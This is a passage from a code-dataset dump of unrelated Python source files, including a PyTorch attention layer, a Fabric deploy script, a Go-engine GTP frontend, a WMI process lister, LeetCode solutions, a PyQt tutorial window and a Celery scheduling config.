self.getShoulderWidth()\n return np.mean(list(widths))\n\n def getHipsWidth(self):\n for seria in self.series:\n subSeria = seria[[\n 'Таз слева',\n 'Таз справа'\n ]]\n width = euclidean(subSeria[0], subSeria[1])\n yield width\n\n def getMeanHipsWidth(self):\n widths = self.getHipsWidth()\n return np.mean(list(widths))","sub_path":"walkSupport/SMP/metrics/body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"190273453","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Attention(nn.Module):\n r\"\"\"\n Applies an attention mechanism on the output features from the decoder.\n\n .. math::\n \\begin{array}{ll}\n x = context*output \\\\\n attn = exp(x_i) / sum_j exp(x_j) \\\\\n output = \\tanh(w * (attn * context) + b * output)\n \\end{array}\n\n Args:\n dim(int): The number of expected features in the output\n\n Inputs: output, context\n - **output** (batch, output_len, dimensions): tensor containing the output features from the decoder.\n - **context** (batch, input_len, dimensions): tensor containing features of the encoded input sequence.\n\n Outputs: output, attn\n - **output** (batch, output_len, dimensions): tensor containing the attended output features from the decoder.\n - **attn** (batch, output_len, input_len): tensor containing attention weights.\n\n Attributes:\n linear_out (torch.nn.Linear): applies a linear transformation to the incoming data: :math:`y = Ax + b`.\n mask (torch.Tensor, optional): applies a :math:`-inf` to the indices specified in the `Tensor`.\n\n Examples::\n\n >>> attention = seq2seq.models.Attention(256)\n >>> context = Variable(torch.randn(5, 3, 256))\n >>> output = Variable(torch.randn(5, 5, 256))\n >>> output, attn = attention(output, context)\n\n \"\"\"\n def __init__(self, dim, n_probes):\n super(Attention, self).__init__()\n self.linear_out = nn.Linear(dim*n_probes, dim)\n self.mask = None\n self.self_attn = nn.Parameter(torch.FloatTensor(n_probes, dim))\n\n def set_mask(self, mask):\n \"\"\"\n Sets indices to be masked\n\n Args:\n mask (torch.Tensor): tensor containing indices to be masked\n \"\"\"\n self.mask = mask\n\n def forward(self, encoder_outputs):\n batch_size = encoder_outputs.size(0)\n hidden_size = encoder_outputs.size(2)\n input_size = encoder_outputs.size(1)\n \n # (batch, n_probes, dim) * (batch, in_len, dim) -> (batch, n_probes, in_len)\n attn = torch.bmm(self.self_attn.expand(batch_size, 10, hidden_size), encoder_outputs.transpose(1, 2))\n# attn = torch.bmm(self.self_attn.expand(batch_size, -1, -1), encoder_outputs.transpose(1, 2))\n if self.mask is not None:\n attn.data.masked_fill_(self.mask, -float('inf'))\n# attn = F.softmax(attn.view(-1, input_size)).view(batch_size, -1, input_size)\n attn = F.softmax(attn.view(-1, input_size), dim=1).view(batch_size, -1, input_size)\n\n # (batch, n_probes, in_len) * (batch, in_len, dim) -> (batch, n_probes, dim)\n mix = torch.bmm(attn, encoder_outputs)\n\n output = F.tanh(self.linear_out(mix.view(batch_size, -1)))\n\n return output\n\n'''\na=Variable(torch.randn(3,3), requires_grad=False)\nb=Variable(torch.randn(3,3), requires_grad=True)\nmask=b.ge(0)\nindices=mask.data.nonzero().transpose(0,1).tolist()\na[indices]=b[indices]\nout=a.mean()\nout.backward()\n'''","sub_path":"seq2seq/models/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"524910681","text":"from fabric.api import task, local, cd, put, hosts, sudo, execute\n\nfrom clldfabric.util import working_directory\nfrom clldfabric import tasks\ntasks.init('glottolog3')\n\n\ndef bin(name):\n return '/home/robert/venvs/clld/bin/' + name\n\n\ndef run_script(name):\n local('%s glottolog3/scripts/%s.py development.ini' % (bin('python'), name))\n\n\n@hosts(tasks.APP.production)\n@task\ndef copy_treefiles():\n with working_directory('glottolog3/static/'):\n local('tar -czvf trees.tgz trees')\n put('trees.tgz', '/tmp')\n\n with cd('/usr/venvs/glottolog3/src/glottolog3/glottolog3/static'):\n sudo('mv /tmp/trees.tgz .')\n sudo('tar -xzvf trees.tgz')\n sudo('chown -R root:root trees')\n\n\n@hosts(tasks.APP.production)\n@task\ndef recreate_treefiles():\n run_script('compute_treefiles')\n execute(copy_treefiles)\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"475079296","text":"import sys\n\nfrom rlgames.util import print_board\nfrom rlgames.game_base import Move\nfrom rlgames.goboard import GameState\nfrom rlgames.agent.termination import TerminationAgent\nfrom rlgames.gtp.board import gtp_position_to_coord, coord_to_gtp_position\nfrom rlgames.gtp import command, response\n\nHANDICAP_STONES = {\n 2: ['D4', 'Q16'],\n 3: ['D4', 'Q16', 'D16'],\n 4: ['D4', 'Q16', 'D16', 'Q4'],\n 5: ['D4', 'Q16', 'D16', 'Q4', 'K10'],\n 6: ['D4', 'Q16', 'D16', 'Q4', 'D10', 'Q10'],\n 7: ['D4', 'Q16', 'D16', 'Q4', 'D10', 'Q10', 'K10'],\n 8: ['D4', 'Q16', 'D16', 'Q4', 'D10', 'Q10', 'K4', 'K16'],\n 9: ['D4', 'Q16', 'D16', 'Q4', 'D10', 'Q10', 'K4', 'K16', 'K10'],\n}\n\nclass GTPFrontend:\n def __init__(self, termination_agent, termination=None):\n self.agent = termination_agent\n self.game_state = GameState.new_game(19)\n self.input = sys.stdin\n self.output = sys.stdout\n self.stopped = False\n self.handlers = {\n 'boardsize' : self.handle_boardsize,\n 'clear_board' : self.handle_clear_board,\n 'fixed_handicap' : self.handle_fixed_handicap,\n 'genmove' : self.handle_genmove,\n 'known_command' : self.handle_known_command,\n 'showboard' : self.handle_showboard,\n 'time_settings' : self.handle_time_settings,\n 'time_left' : self.handle_time_left,\n 'play' : self.handle_play,\n 'protocol_version' : self.handle_protocol_version,\n 'quit' : self.handle_quit,\n }\n\n def run(self):\n while not self.stopped:\n input_line = self.input.readline().strip()\n cmd = command.parse(input_line)\n resp = self.process(cmd)\n self.output.write(response.serialize(cmd, resp))\n self.output.flush()\n \n def process(self):\n handler = self.handlers.get(cmd.name, self.handle_unknown)\n return handler(*cmd.args)\n\n def handle_play(self, color, move):\n if move.lower() == 'pass':\n self.game_state = self.game_state.apply_move(Move.pass_turn())\n elif move.lower() == 'resign':\n self.game_state = self.game_state.apply_move(Move.resign())\n else:\n self.game_state = self.game_state.apply_move(gtp_position_to_coord(move))\n return response.success()\n\n def handle_genmove(self, color):\n move = self.agent.select_move(self.game_state)\n self.game_state = self.game_state.apply_move(move)\n if move.is_pass:\n return response.success('pass')\n elif move.is_resign:\n return response.success('resign')\n else:\n return response.success(coord_to_gtp_position(move))\n\n def handle_fixed_handicap(self, nstones):\n nstones = int(nstones)\n for stone in HANDICAP_STONES[nstones]:\n self.game_state = self.game_state.apply_move(gtp_position_to_coord(stone))\n return response.success()\n\n def handle_quit(self):\n self.stopped = True\n return response.success()\n\n def handle_clear_board(self):\n self.game_state = GameState.new_game(19)\n return response.success()\n\n def handle_known_command(self, command_name):\n return response.bool_response(command_name in self.handlers.keys())\n\n def handle_boardsize(self, size):\n if int(size) != 19:\n return response.error('Only 19x19 currently supported, requested {}'.format(size))\n return response.success()\n\n def handle_showboard(self):\n print_board(self.game_state.board)\n return response.success()\n\n def handle_time_left(self, color, time, stones):\n # TODO: Arguments: color color, int time, int stones\n return response.success()\n\n def handle_time_settings(self, main_time, byo_yomi_time, byo_yomi_stones):\n # TODO: Arguments: int main_time, int byo_yomi_time, int byo_yomi_stones\n return response.success()\n\n def handle_unknown(self, *args):\n return response.error('Unrecognized command')\n\n def ignore(self, *args):\n return response.success()\n\n def handle_protocol_version(self):\n return response.success('2')\n","sub_path":"python/rlgames/gtp/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"536372388","text":"#!/usr/bin/python\n\n\"\"\"\nWMI: Remote machine processes\n\"\"\"\n\n\nimport sys\nimport lib_util\nimport lib_common\nimport lib_wmi\nfrom lib_properties import pc\n\n# If it cannot be imported, this is checked when loading the script.\nimport wmi\n\n\n#instance of Win32_Process\n#{\n# Caption = \"SearchFilterHost.exe\";\n# CommandLine = \"\\\"C:\\\\Windows\\\\system32\\\\SearchFilterHost\n# CreationClassName = \"Win32_Process\";\n# CreationDate = \"20150312142114.211889+000\";\n# CSCreationClassName = \"Win32_ComputerSystem\";\n# CSName = \"LONW00052257\";\n# Description = \"SearchFilterHost.exe\";\n# ExecutablePath = \"C:\\\\Windows\\\\system32\\\\SearchFilterHos\n# Handle = \"26376\";\n# HandleCount = 106;\n# KernelModeTime = \"156001\";\n# MaximumWorkingSetSize = 32768;\n# MinimumWorkingSetSize = 200;\n# Name = \"SearchFilterHost.exe\";\n# OSCreationClassName = \"Win32_OperatingSystem\";\n# OSName = \"Microsoft Windows 7 Enterprise |C:\\\\Windows|\\\\\n# OtherOperationCount = \"627\";\n# OtherTransferCount = \"4620\";\n# PageFaults = 2206;\n# PageFileUsage = 3408;\n# ParentProcessId = 964;\n# PeakPageFileUsage = 3408;\n# PeakVirtualSize = \"35500032\";\n# PeakWorkingSetSize = 7340;\n# Priority = 4;\n# PrivatePageCount = \"3489792\";\n# ProcessId = 26376;\n# QuotaNonPagedPoolUsage = 9;\n# QuotaPagedPoolUsage = 96;\n# QuotaPeakNonPagedPoolUsage = 9;\n# QuotaPeakPagedPoolUsage = 96;\n# ReadOperationCount = \"353\";\n# ReadTransferCount = \"29438\";\n# SessionId = 0;\n# ThreadCount = 6;\n# UserModeTime = \"156001\";\n# VirtualSize = \"35500032\";\n# WindowsVersion = \"6.1.7601\";\n# WorkingSetSize = \"7516160\";\n# WriteOperationCount = \"0\";\n# WriteTransferCount = \"0\";\n#};\n\nCanProcessRemote = True\n\ndef Main():\n\tcgiEnv = lib_common.CgiEnv(can_process_remote = True)\n\tmachineName = cgiEnv.GetId()\n\n\tgrph = cgiEnv.GetGraph()\n\n\t# If running on the local machine, pass the host as None otherwise authorization is checked\n\t# just like a remote machine, which means User Account Control (UAC) disabling,\n\t# and maybe setting LocalAccountTokenFilterPolicy=1\n\tif not machineName or lib_util.IsLocalAddress( machineName ):\n\t\tmachNameNotNone = lib_util.currentHostname\n\t\tserverBox = lib_common.gUriGen\n\telse:\n\t\tmachNameNotNone = machineName\n\t\tserverBox = lib_common.RemoteBox(machineName)\n\n\ttry:\n\t\t# On a le probleme \"access denied\" avec tous les acces remote windows.\n\t\t# Meme probleme aussi avec WMI alors que ca marchait avant.\n\t\t# Comme s'il y avait une connection implicite de rchateau, quand ca marchait, et qu'elle ait disparu maintenant.\n\t\t# Toutefois, ceci fonctionne.\n\t\t# >>> c = wmi.WMI(wmi=wmi.connect_server(server='Titi', namespace=\"/root/cimv2\", user='rchateauneu@hotmail.com', password='xxxx'))\n\n\t\tsys.stderr.write(\"Explicit WMI connection machineName=%s\\n\" % ( machNameNotNone ) )\n\n\t\tcnnct = lib_wmi.WmiConnect(machNameNotNone,\"/root/cimv2\")\n\n\t\t#(wmiUser,wmiPass) = lib_credentials.GetCredentials(\"WMI\",machineName)\n\t\t#sys.stderr.write(\"machineName= %wmiUser=%s\\n\" % ( machineName, wmiUser ) )\n\t\t#cnnct = wmi.WMI(wmi=wmi.connect_server(server=machineName, namespace=\"/root/cimv2\", user=wmiUser, password=wmiPass))\n\texcept Exception:\n\t\tlib_common.ErrorMessageHtml(\"WMI \" + machineName + \" processes. Caught:\" + str(sys.exc_info()) )\n\n\t# With a dictionary so node are created once only.\n\tMain.dictPidToNode = {}\n\n\tdef PidToNode(procId):\n\t\ttry:\n\t\t\treturn Main.dictPidToNode[procId]\n\t\texcept KeyError:\n\t\t\tnode = serverBox.PidUri(procId)\n\n\t\t\tMain.dictPidToNode[procId] = node\n\t\t\treturn node\n\n\tfor processProperties in cnnct.Win32_Process ():\n\n\t\tnode_process = PidToNode(processProperties.ProcessId)\n\t\tparent_node_process = PidToNode(processProperties.ParentProcessId)\n\n\t\tgrph.add( ( node_process, pc.property_ppid, parent_node_process ) )\n\t\t#grph.add( ( node_process, pc.property_pid, lib_common.NodeLiteral(processProperties.ProcessId) ) )\n\n\t\t# Si on laisse faire le code, ca va afficher:\n\t\t# No such process:1292 at Titi\n\t\t# pid 1292\n\t\t#\n\t\t# Or, c'est idiot car on a deja toutes les donnees sous la main.\n\n\t\t# >>> lp = cnnct.Win32_Process ()\n\t\t# >>> lp[0]\n\t\t# <_wmi_object: \\\\TITI\\root\\cimv2:Win32_Process.Handle=\"0\">\n\t\t# >>> str(lp[0])\n\t\t# '\\ninstance of Win32_Process\\n{\\n\\tCaption = \"System Idle Process\";\\n\\tCreationClassName = \"Win32_Process\";\\n\\tCreationDate = \"20161\n\t\t# 215105022.381553+000\";\\n\\tCSCreationClassName = \"Win32_ComputerSystem\";\\n\\tCSName = \"TITI\";\\n\\tDescription = \"System Idle Process\";\\\n\t\t# n\\tHandle = \"0\";\\n\\tHandleCount = 0;\\n\\tKernelModeTime = \"23403826406250\";\\n\\tName = \"System Idle Process\";\\n\\tOSCreationClassName =\n\t\t# \"Win32_OperatingSystem\";\\n\\tOSName = \"Microsoft Windows 8.1|C:\\\\\\\\Windows|\\\\\\\\Device\\\\\\\\Harddisk0\\\\\\\\Partition4\";\\n\\tOtherOperation\n\t\t# Count = \"0\";\\n\\tOtherTransferCount = \"0\";\\n\\tPageFaults = 1;\\n\\tPageFileUsage = 0;\\n\\tParentProcessId = 0;\\n\\tPeakPageFileUsage = 0;\n\t\t# \\n\\tPeakVirtualSize = \"65536\";\\n\\tPeakWorkingSetSize = 4;\\n\\tPriority = 0;\\n\\tPrivatePageCount = \"0\";\\n\\tProcessId = 0;\\n\\tQuotaNonP\n\t\t# agedPoolUsage = 0;\\n\\tQuotaPagedPoolUsage = 0;\\n\\tQuotaPeakNonPagedPoolUsage = 0;\\n\\tQuotaPeakPagedPoolUsage = 0;\\n\\tReadOperationCo\n\t\t# unt = \"0\";\\n\\tReadTransferCount = \"0\";\\n\\tSessionId = 0;\\n\\tThreadCount = 4;\\n\\tUserModeTime = \"0\";\\n\\tVirtualSize = \"65536\";\\n\\tWin\n\t\t# dowsVersion = \"6.3.9600\";\\n\\tWorkingSetSize = \"4096\";\\n\\tWriteOperationCount = \"0\";\\n\\tWriteTransferCount = \"0\";\\n};\\n'\n\n\n\t\tgrph.add( ( node_process, pc.property_information, lib_common.NodeLiteral(processProperties.Caption) ) )\n\t\tif processProperties.Caption != processProperties.Description:\n\t\t\tgrph.add( ( node_process, lib_common.MakeProp(\"Description\"), lib_common.NodeLiteral(processProperties.Description) ) )\n\n\t\t# AJOUTER LE LIEN WMI ICI ET DANS LA PAGE http://127.0.0.1:8000/survol/entity.py?xid=Titi@CIM_Process.Handle=6344\n\n\t\t# All the rest is not needed yet, there would be too much things to display.\n\t\t#grph.add( ( node_process, pc.property_command, lib_common.NodeLiteral(process.CommandLine) ) )\n\t\t#\n\t\t#exec_name = process.ExecutablePath\n\t\t#if exec_name != None:\n\t\t#\texec_node = lib_common.gUriGen.FileUri( exec_name.replace('\\\\','/') )\n\t\t#\tgrph.add( ( node_process, pc.property_runs, exec_node ) )\n\n\tcgiEnv.OutCgiRdf()\n\nif __name__ == '__main__':\n\tMain()\n","sub_path":"survol/sources_types/CIM_ComputerSystem/wmi_hostname_processes.py","file_name":"wmi_hostname_processes.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"274742736","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # if target is even\n res = [-1,-1]\n if (target % 2) == 0:\n count = 0\n target_half = target / 2\n for index,val in enumerate(nums):\n if val == target_half:\n res[count] = index\n count += 1\n if count >= 2:\n return res\n\n # dedup\n nums0 = list(set(nums))\n if len(nums0) < 2:\n return [0,1]\n\n nums0 = [target - val for index,val in enumerate(nums0)] + [val for index,val in enumerate(nums0)]\n nums0 = sorted(nums0, reverse=False)\n\n first = 0\n prev = nums0[0]\n for i in range(1, len(nums0)):\n current = nums0[i]\n if current == prev:\n first = current\n break\n prev = current\n second = target - first\n count = 0\n for index,val in enumerate(nums):\n if second == val or first == val:\n res[count] = index\n count += 1","sub_path":"py/P0001.py","file_name":"P0001.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"475893655","text":"from PyQt5 import QtCore\nfrom feeds import update_feed\n\n\nclass Updater(QtCore.QThread):\n def __init__(self, feeds_urls=[]):\n QtCore.QThread.__init__(self)\n self.feeds_urls = feeds_urls\n self.feed_data = dict()\n\n def run(self):\n for url_to_feed in self.feeds_urls:\n title, new_data = update_feed(url_to_feed)\n\n if new_data is not None:\n self.feed_data[title] = new_data\n","sub_path":"updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"49049399","text":"class Solution(object):\n def totalNQueens(self, n):\n \"\"\"\n :type n: int\n :rtype: List[List[str]]\n \"\"\"\n result = []\n if n == 0:\n return result\n matrix = [\".\" * n] * n\n row = 0\n self.arrangeQueens(result, row, matrix)\n return len(result)\n\n\n def arrangeQueens(self, result, row, matrix):\n n = len(matrix)\n for col in range(n):\n matrix[row] = \".\" * col + \"Q\" + \".\" * (n - col - 1)\n if self.is_valid(matrix, row, col):\n if row == n - 1:\n # matrix会变化,保存matrix.copy()在result中\n result.append(matrix.copy())\n else:\n self.arrangeQueens(result, row+1, matrix)\n else:\n matrix[row] = \".\" * n\n\n\n def is_valid(self, matrix, row, col):\n # 首先,每行一定只有一个\"Q\",不需要检查\n # 检查之前的每一列\n for i in range(row):\n if matrix[i][col] == \"Q\":\n return False\n\n # 检查主对角线, 只需要检查上半部分即可,下半部分还没有填入元素\n i = row - 1\n j = col - 1\n while i >= 0 and j >= 0:\n if matrix[i][j] == \"Q\":\n return False\n i -= 1\n j -= 1\n\n # 检查次对角线,也只需要检查上半部分\n i = row - 1\n j = col + 1\n while i >= 0 and j <= len(matrix) - 1:\n if matrix[i][j] == \"Q\":\n return False\n i -= 1\n j += 1\n\n return True\n\nif __name__ == '__main__':\n solution = Solution()\n result = solution.totalNQueens(4)\n print(result)\n\n\n\n\n\n","sub_path":"leetcode/51-100/_51_solveQueens.py","file_name":"_51_solveQueens.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"97765286","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/trjg/code/venv/django-geo-db/lib/python3.5/site-packages/django_geo_db/management/commands/setup_map_types.py\n# Compiled at: 2018-03-10 10:16:54\n# Size of source mod 2**32: 421 bytes\nfrom django.core.management.base import BaseCommand\nfrom django_geo_db.models import LocationMapType\nTYPES = [\n 'simple']\n\nclass Command(BaseCommand):\n help = 'Adds default map types.'\n\n def handle(self, *args, **options):\n for t in TYPES:\n map_type, created = LocationMapType.objects.get_or_create(type=t)\n if created:\n print('Created: {0}'.format(str(map_type)))","sub_path":"pycfiles/django_geo_db-0.2.1.linux-x86_64.tar/setup_map_types.cpython-35.py","file_name":"setup_map_types.cpython-35.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"518981898","text":"\"\"\"Test module for the Malta parse_start_date processor.\"\"\"\n\nfrom pytest import mark\nimport datetime\nfrom common.processors.MT.parse_dates import parse_dates\n\ndate_examples = [\n ('2011', (2011, 1, 1)),\n ('Q2 2011', (2011, 4, 1)),\n ('Q 4 2011', (2011, 10, 1)),\n ('Quarter 3 2011', (2011, 7, 1)),\n ('Quarter2 2011', (2011, 4, 1)),\n ('Tuesday, October 18, 2011', (2011, 10, 18)),\n ('31/01/2011', (2011, 1, 31))\n]\n\n\n@mark.parametrize('raw_date, date_tuple', date_examples)\ndef test_parse_start_date_parses_correctly(raw_date, date_tuple):\n row = {'Start Date': raw_date}\n result = parse_dates(row, date_fields=['Start Date'])['Start Date']\n assert result == datetime.date(*date_tuple)\n","sub_path":"eu-structural-funds/tests/processors/MT/test_parse_dates.py","file_name":"test_parse_dates.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"619376568","text":"import torch\nimport torch.nn as nn\n\nclass BaseModel(nn.Module):\n\n def __init__(self):\n\n super().__init__()\n\n # Paramters\n\n # Loss Function\n self.loss_fn = nn.CrossEntropyLoss()\n\n def forward(self, batch):\n\n predictions = None\n\n loss = self.loss_fn(predictions, batch['targets'])\n\n return loss\n\n def save(self, **kwargs):\n params = dict()\n params['state_dict'] = {k:v.cpu() for k, v in self.state_dict().items()}\n\n for k,v in kwargs.items():\n params[k] = v\n\n torch.save(params, open('model.pt', 'wb'))\n\n @classmethod\n def load(cls, file_name):\n params = torch.load(file_name)\n\n model = cls()\n\n model.load_state_dict(params['state_dict'])\n\n return model\n","sub_path":"base/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"224197491","text":"'''\nTutorial 10 PyQT Font widget\n\nadd Font widget\nexcluded an issue about macOS can't change the font.\nPyQt5 upgrade to 12.1 or downgrade to 10.1\n'''\n\nimport sys\nfrom PyQt5.QtWidgets import QMessageBox, QPushButton, QProgressBar, QLabel, QComboBox, QSpacerItem, QFontDialog\nfrom PyQt5.QtWidgets import QStyleFactory, QLabel, QComboBox, QMainWindow, QSizePolicy, QRadioButton\nfrom PyQt5.QtWidgets import QWidget, QApplication, QAction, QHBoxLayout, QVBoxLayout\nfrom PyQt5.QtCore import QCoreApplication, Qt, QRect\nfrom PyQt5.QtGui import *\n\nclass Winodw(QMainWindow):\n\n def __init__(self, parent=None):\n\n super(Winodw, self).__init__(parent)\n self.setGeometry(100,100,500,300)\n self.setWindowTitle(\"PyQt Tutorial 10\")\n\n # 調用 FormWidget 進入MainWindow\n self.form_widget = FormWidget(self)\n\n self.setCentralWidget(self.form_widget)\n\n # 設定脫離行為\n extractAction = QAction(QIcon(\"exit.png\"), \" &Exit\", self)\n extractAction.setShortcut(\"Shift+Q\")\n extractAction.setStatusTip(\"Leave The Application\")\n extractAction.triggered.connect(self.close_application)\n\n # 設定選擇字體\n fontChoice = QAction(QIcon(\"typography.png\"), \" &Font Style\", self)\n fontChoice.setShortcut(\"Ctrl+F\")\n fontChoice.setStatusTip(\"Change Font Styles\")\n fontChoice.triggered.connect(self.fontChoice)\n # 啟動statusBar\n self.statusBar()\n\n # 在主視窗加入toolBar\n self.toolBar_MainToolBar = self.addToolBar(\"MainToolBar\")\n\n # 在toolBar加入按鈕\n self.toolBar_MainToolBar.addAction(extractAction)\n\n # 獨立ToolBar for change font style\n self.toolBar_Edit = self.addToolBar(\"Edit\")\n self.toolBar_Edit.addAction(fontChoice)\n\n self.Label_fontTest = QLabel('Change:\\n0123456789')\n self.toolBar_Edit.addWidget(self.Label_fontTest)\n\n # 設定Main Menu\n mainMenu = self.menuBar()\n\n # 禁用原生MenuBar\n mainMenu.setNativeMenuBar(False)\n fileMenu = mainMenu.addMenu(\" &File\")\n fileMenu.addAction(extractAction)\n\n # 設置無邊框視窗樣式\n self.setWindowFlags(Qt.FramelessWindowHint)\n #子視窗,視窗無按鈕 ,但有標題,可注釋掉觀察效果\n # self.setWindowFlags(Qt.SubWindow)\n\n #透過桌面模組得到屏幕的尺寸\n desktop=QApplication.desktop()\n #得到桌面可顯示的尺寸\n rect=desktop.availableGeometry()\n #設置視窗為屏幕可以顯示尺寸\n self.setGeometry(rect)\n #顯示視窗\n self.show()\n\n def fontChoice(self):\n font, valid = QFontDialog.getFont()\n print(font)\n if valid:\n self.Label_fontTest.setFont(font)\n\n def close_application(self):\n choice = QMessageBox.question(self, \"Extract!\",\n \"Are You Going to Leave Now?\",\n QMessageBox.Yes | QMessageBox.No)\n \"\"\"QMessageBox including\n question For asking a question during normal operations.\n information For reporting information about normal operations.\n warning For reporting non-critical errors.\n critical For reporting critical errors.\n \"\"\"\n if choice == QMessageBox.Yes:\n print(\"Function has been terminated.\")\n sys.exit()\n else:\n pass\n # do nothing\n\nclass FormWidget(QWidget):\n\n def __init__(self,parent):\n super(FormWidget, self).__init__(parent)\n #水平佈局\n self.Hlayout_1=QHBoxLayout()\n self.Hlayout_2=QHBoxLayout()\n self.Hlayout_3=QHBoxLayout()\n #垂直佈局\n self.Vlayout_1=QVBoxLayout()\n self.Vlayout_2=QVBoxLayout()\n self.Vlayout_3=QVBoxLayout()\n\n #實例化標籤與列表模組\n self.styleLabel_1=QLabel('Set Style')\n self.styleComboBox=QComboBox()\n\n #從QStyleFactory中增加多個顯示樣式到列表模組\n self.styleComboBox.addItems(QStyleFactory.keys())\n\n #選擇當前視窗的風格\n index=self.styleComboBox.findText(\n QApplication.style().objectName(),\n Qt.MatchFixedString\n )\n\n #設置當前視窗的風格\n self.styleComboBox.setCurrentIndex(index)\n\n #通過combobox模組選擇視窗風格\n self.styleComboBox.activated[str].connect(self.handlestyleChanged)\n\n self.progress = QProgressBar(self)\n self.progress.setGeometry(0,0,10,10)\n\n # QRadioButton\n self.styleLabel_2=QLabel('Set Style')\n # self.styleLabel_2.setAlignment(Qt.AlignCenter)\n\n self.macintosh = QRadioButton(self)\n self.macintosh.setObjectName(\"macintosh\")\n self.macintosh.setText(\"macintosh\")\n self.windows = QRadioButton(self)\n self.windows.setObjectName(\"windows\")\n self.windows.setText(\"windows\")\n self.fusion = QRadioButton(self)\n self.fusion.setObjectName(\"fusion\")\n self.fusion.setText(\"fusion\")\n\n\n\n # 設定選擇字體\n self.btn_fontChoice = QPushButton(QIcon(\"typography.png\"), \"Font Style\", self)\n self.btn_fontChoice.setShortcut(\"Ctrl+F\")\n self.btn_fontChoice.clicked.connect(self.fontChoice)\n\n # Add a button shortcut\n self.btn_download = QPushButton(\"Download\",self)\n self.btn_download.setShortcut(\"Meta+D\")\n # self.btn_download.resize(200,60)\n # self.btn_download.move(150,135)\n self.btn_download.clicked.connect(self.download)\n\n # 空間排版物件\n spacerItem1 = QSpacerItem(0, 0,QSizePolicy.Expanding, QSizePolicy.Expanding)\n #QSizePolicy\n # - Fixed\n # - Minimum\n # - Maximum\n # - Preferred\n # - MinimumExpanding\n # - Expanding\n # - Ignored\n\n\n # 開始增加模組到主視窗,設置視窗佈置\n # 將視窗設定水平佈置\n self.setLayout(self.Hlayout_1)\n\n # 將Hlayout_1分為三份\n self.Hlayout_1.addLayout(self.Vlayout_1)\n self.Hlayout_1.addLayout(self.Vlayout_2)\n self.Hlayout_1.addLayout(self.Vlayout_3)\n\n # 在最左側的Vlayout_1加入QRadioButton\n self.Vlayout_1.addWidget(self.styleLabel_2)\n self.Vlayout_1.addWidget(self.macintosh)\n self.Vlayout_1.addWidget(self.windows)\n self.Vlayout_1.addWidget(self.fusion)\n # 在最左側的Vlayout_1加入spacerItem\n self.Vlayout_1.addItem(spacerItem1)\n self.Vlayout_1.addWidget(self.btn_fontChoice)\n\n # 在中間的Vlayout_2加入兩個水平佈置與一個spacerItem\n self.Vlayout_2.addLayout(self.Hlayout_2)\n self.Vlayout_2.addLayout(self.Hlayout_3)\n self.Vlayout_2.addItem(spacerItem1)\n\n # 在中間Vlayout_2最上方Hlayout_2左側加入文字標籤\n self.Hlayout_2.addWidget(self.styleLabel_1)\n # 在中間Vlayout_2最上方Hlayout_2右側加入ComboBox\n self.Hlayout_2.addWidget(self.styleComboBox)\n\n # 在中間Vlayout_2最下方Hlayout_3左側加入progressBar\n self.Hlayout_3.addWidget(self.progress)\n # 在中間Vlayout_2最下方Hlayout_3右側加入按鈕\n self.Hlayout_3.addWidget(self.btn_download)\n\n # 在最右側的Vlayout_3加入spacerItem\n self.Vlayout_3.addItem(spacerItem1)\n\n def fontChoice(self):\n font, valid = QFontDialog.getFont()\n if valid:\n self.styleLabel_1.setFont(font)\n self.styleLabel_2.setFont(font)\n self.styleComboBox.setFont(font)\n\n #改變視窗風格\n def handlestyleChanged(self,style):\n QApplication.setStyle(style)\n print(QApplication.style().objectName(),\n Qt.MatchFixedString)\n\n def download(self):\n self.completed = 0\n while self.completed < 100:\n self.completed += 0.1\n self.progress.setValue(self.completed)\n\n def downloadCompleted(self):\n completedNotice = QMessageBox.information(self, \"completed\", \"Completed!\")\n\napp = QApplication([])\nfoo = Winodw()\nfoo.show()\nsys.exit(app.exec_())\n","sub_path":"Coding/System/Sentdex/PyQt/10.Font_Widget/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"125531524","text":"from celery import Celery\nimport time\nfrom kombu import Queue, Exchange\n\nfrom celery.utils.log import get_task_logger\nlogger = get_task_logger(__name__)\n\napp = Celery()\n# Load from config file\napp.config_from_object('celeryconfig')\n\napp.conf.task_queues = (\n Queue('scanned_log', exchange=Exchange('ScanTask', type='direct'),\n routing_key='task.log.scan'),\n)\n\napp.conf.beat_schedule = {\n 'scan-every-600-seconds': {\n 'task': 'tasks.log_scan',\n 'schedule': 20.0,\n 'args': (10, 16),\n 'options': {'queue': 'scanned_log',\n 'exchange': 'ScanTask', 'routing_key': 'task.log.scan'}\n },\n}\n\n\n@app.task()\ndef log_scan(*args, 